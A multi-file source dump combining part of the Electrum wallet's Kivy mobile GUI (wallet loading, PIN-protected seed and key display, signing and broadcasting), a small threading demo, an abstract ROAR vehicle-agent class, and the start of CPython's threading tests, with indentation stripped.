popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
mtprint4.py | import threading
class MyClass:
def __call__(self, a, b, c):
print('Hello', a, b, c)
if __name__ == '__main__':
for i in range(3):
t = threading.Thread(target=MyClass(), args=(10, 20, 30))
t.start() # target(*args)
|
agent.py | from abc import ABC, abstractmethod
import logging
from ROAR.utilities_module.vehicle_models import Vehicle
from ROAR.utilities_module.data_structures_models import SensorsData, IMUData, Transform
from ROAR.utilities_module.vehicle_models import VehicleControl
from typing import Optional, List
from pathlib import Path
import cv2
import numpy as np
from ROAR.utilities_module.module import Module
from ROAR.configurations.configuration import Configuration as AgentConfig
from ROAR.planning_module.local_planner.local_planner import LocalPlanner
from ROAR.planning_module.behavior_planner.behavior_planner import BehaviorPlanner
from ROAR.planning_module.mission_planner.mission_planner import MissionPlanner
import threading
from typing import Dict, Any
from datetime import datetime
class Agent(ABC):
"""
Abstract Agent class that define the minimum of a ROAR agent.
Inherited agent can perform different duties.
"""
def __init__(self, vehicle: Vehicle, agent_settings: AgentConfig, imu: Optional[IMUData] = None,
should_init_default_cam=True, **kwargs):
"""
Initialize cameras, output folder, and logging utilities
Args:
vehicle: Vehicle instance
agent_settings: User specified settings for Agent
imu: IMU data (will be deprecated to be passed in like this)
"""
self.logger = logging.getLogger(__name__)
self.vehicle = vehicle
self.agent_settings = agent_settings
self.front_rgb_camera = agent_settings.front_rgb_cam
self.front_depth_camera = agent_settings.front_depth_cam
self.rear_rgb_camera = agent_settings.rear_rgb_cam
self.imu = imu
self.is_done = False
self.output_folder_path = \
Path(self.agent_settings.output_data_folder_path)
self.front_depth_camera_output_folder_path = \
self.output_folder_path / "front_depth"
self.front_rgb_camera_output_folder_path = \
self.output_folder_path / "front_rgb"
self.rear_rgb_camera_output_folder_path = \
self.output_folder_path / "rear_rgb"
self.should_save_sensor_data = self.agent_settings.save_sensor_data
self.transform_output_folder_path = self.output_folder_path / "transform"
self.local_planner: Optional[LocalPlanner] = None
self.behavior_planner: Optional[BehaviorPlanner] = None
self.mission_planner: Optional[MissionPlanner] = None
self.threaded_modules: List[Module] = []
self.time_counter = 0
self.transform_history: List[Transform] = []
if should_init_default_cam:
self.init_cam()
if self.should_save_sensor_data:
self.front_depth_camera_output_folder_path.mkdir(parents=True,
exist_ok=True)
self.front_rgb_camera_output_folder_path.mkdir(parents=True,
exist_ok=True)
self.rear_rgb_camera_output_folder_path.mkdir(parents=True,
exist_ok=True)
self.transform_output_folder_path.mkdir(parents=True,
exist_ok=True)
self.kwargs: Dict[str, Any] = kwargs # additional info
def add_threaded_module(self, module: Module):
if module.threaded:
self.threaded_modules.append(module)
else:
msg = f"Module {module} is not registered as threaded, but is attempting to run threaded"
self.logger.error(msg)
raise threading.ThreadError(msg)
def init_cam(self) -> None:
"""
Initialize the cameras by calculating the camera intrinsics and
ensuring that the output folder path exists
Returns:
None
"""
if self.front_rgb_camera is not None:
self.front_rgb_camera.intrinsics_matrix = (
self.front_rgb_camera.calculate_default_intrinsics_matrix()
)
if self.front_depth_camera is not None:
self.front_depth_camera.intrinsics_matrix = (
self.front_depth_camera.calculate_default_intrinsics_matrix()
)
if self.rear_rgb_camera is not None:
self.rear_rgb_camera.intrinsics_matrix = (
self.rear_rgb_camera.calculate_default_intrinsics_matrix()
)
@abstractmethod
def run_step(self, sensors_data: SensorsData,
vehicle: Vehicle) -> VehicleControl:
"""
Receive Sensor Data and vehicle state information on every step and
return a control
Args:
sensors_data: sensor data on this frame
vehicle: vehicle state on this frame
Returns:
Vehicle Control
"""
self.time_counter += 1
self.sync_data(sensors_data=sensors_data, vehicle=vehicle)
if self.should_save_sensor_data:
self.save_sensor_data()
if self.local_planner is not None and self.local_planner.is_done():
self.is_done = True
return VehicleControl()
def sync_data(self, sensors_data: SensorsData, vehicle: Vehicle) -> None:
"""
Sync agent's state by updating Sensor Data and vehicle information
Args:
sensors_data: the new frame's sensor data
vehicle: the new frame's vehicle state
Returns:
None
"""
self.vehicle = vehicle
self.transform_history.append(self.vehicle.transform)
if self.front_rgb_camera is not None:
self.front_rgb_camera.data = (
sensors_data.front_rgb.data
if sensors_data.front_rgb is not None
else None
)
if self.front_depth_camera is not None:
self.front_depth_camera.data = (
sensors_data.front_depth.data
if sensors_data.front_depth is not None
else None
)
if self.rear_rgb_camera is not None:
self.rear_rgb_camera.data = (
sensors_data.rear_rgb.data
if sensors_data.rear_rgb is not None
else None
)
if self.imu is not None:
self.imu = sensors_data.imu_data
def save_sensor_data(self) -> None:
"""
Failure-safe saving function that saves all the sensor data of the
current frame
Returns:
None
"""
now = datetime.now().strftime('%m_%d_%Y_%H_%M_%S')
try:
if self.front_rgb_camera is not None and self.front_rgb_camera.data is not None:
cv2.imwrite((self.front_rgb_camera_output_folder_path /
f"frame_{now}.png").as_posix(),
self.front_rgb_camera.data)
except Exception as e:
self.logger.error(
f"Failed to save at Frame {self.time_counter}. Error: {e}")
try:
if self.front_rgb_camera is not None and self.front_rgb_camera.data is not None:
np.save((self.front_depth_camera_output_folder_path /
f"frame_{now}").as_posix(),
self.front_depth_camera.data)
except Exception as e:
self.logger.error(
f"Failed to save at Frame {self.time_counter}. Error: {e}")
try:
if self.rear_rgb_camera is not None and self.rear_rgb_camera.data is not None:
cv2.imwrite((self.rear_rgb_camera_output_folder_path /
f"frame_{now}.png").as_posix(),
self.rear_rgb_camera.data)
except Exception as e:
self.logger.error(
f"Failed to save at Frame {self.time_counter}. Error: {e}")
try:
transform_file = (Path(self.transform_output_folder_path) /
f"frame_{now}.txt").open('w')
transform_file.write(self.vehicle.transform.record())
transform_file.close()
except Exception as e:
self.logger.error(
f"Failed to save at Frame {self.time_counter}. Error: {e}")
def start_module_threads(self):
for module in self.threaded_modules:
threading.Thread(target=module.run_in_threaded, daemon=True).start()
self.logger.debug(f"{module.__class__.__name__} thread started")
def shutdown_module_threads(self):
for module in self.threaded_modules:
module.shutdown()
|
test_threading.py | """
Tests for the threading module.
"""
import test.support
from test.support import threading_helper
from test.support import verbose, cpython_only
from test.support.import_helper import import_module
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from unittest import mock
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = threading_helper.threading_setup()
def tearDown(self):
threading_helper.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
@cpython_only
def test_name(self):
def func(): pass
thread = threading.Thread(name="myname1")
self.assertEqual(thread.name, "myname1")
# Convert int name to str
thread = threading.Thread(name=123)
self.assertEqual(thread.name, "123")
# target name is ignored if name is specified
thread = threading.Thread(target=func, name="myname2")
self.assertEqual(thread.name, "myname2")
with mock.patch.object(threading, '_counter', return_value=2):
thread = threading.Thread(name="")
self.assertEqual(thread.name, "Thread-2")
with mock.patch.object(threading, '_counter', return_value=3):
thread = threading.Thread()
self.assertEqual(thread.name, "Thread-3")
with mock.patch.object(threading, '_counter', return_value=5):
thread = threading.Thread(target=func)
self.assertEqual(thread.name, "Thread-5 (func)")
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
